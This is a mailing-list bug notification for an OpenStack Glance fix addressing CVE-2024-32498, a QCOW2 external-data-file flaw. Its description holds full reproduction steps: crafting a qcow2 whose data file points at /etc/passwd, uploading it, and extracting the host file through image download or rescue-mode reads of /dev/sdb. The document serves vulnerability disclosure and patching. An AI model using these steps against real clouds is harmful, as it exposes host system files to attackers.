[Bug 2059809] Fix merged to glance (unmaintained/zed)

OpenStack Infra 2059809 at bugs.launchpad.net
Mon Jul 15 19:06:06 UTC 2024 

Reviewed:  https://review.opendev.org/c/openstack/glance/+/923304
Committed: https://opendev.org/openstack/glance/commit/6a38aef8baaf5caecbd8c866f1cf922d939dfbcc
Submitter: "Zuul (22348)"
Branch:    unmaintained/zed

commit 6a38aef8baaf5caecbd8c866f1cf922d939dfbcc
Author: Dan Smith <dansmith at redhat.com>
Date:   Mon Apr 1 08:06:31 2024 -0700

    Reject qcow files with data-file attributes
    
    Change-Id: I6326a3e85c1ba4cb1da944a4323769f2399ed2c1
    Closes-Bug: #2059809
    (cherry picked from commit 2ca29af4433e9fa99a0a48e230d8d25d6eaa4a87)
    (cherry picked from commit c3586f3a122f6cb0663217b12b52203e74e2e4fa)
    (cherry picked from commit a92c438fb5ba55440b38cae7c8b4361b58daa9dd)
    (cherry picked from commit dba3bdb458aa8a5d0193f12b7f1e374a89ed34a2)

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to Ubuntu Cloud Archive.
https://bugs.launchpad.net/bugs/2059809

Title:
  [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
  (CVE-2024-32498)

Status in Cinder:
  Fix Released
Status in Ubuntu Cloud Archive:
  Fix Released
Status in Ubuntu Cloud Archive antelope series:
  Fix Released
Status in Ubuntu Cloud Archive bobcat series:
  Fix Released
Status in Ubuntu Cloud Archive caracal series:
  Fix Released
Status in Ubuntu Cloud Archive ussuri series:
  Fix Committed
Status in Ubuntu Cloud Archive yoga series:
  Fix Released
Status in Glance:
  Fix Released
Status in OpenStack Compute (nova):
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
  QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.

  Steps to Reproduce:

  - Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
  - Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
  - Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
  - Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.

  With the non-bootable instance there might be two ways to continue:

  Option 1:
  - Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
  - Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
  - The file content starts at guest cluster 0

  Option 2: (this is untested because I reproduced it only in a production system)
  - Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
  - Go to the Dashboard, open the console of the instance and login to the instance.
  - Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
  - It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions

More information about the Ubuntu-openstack-bugs mailing list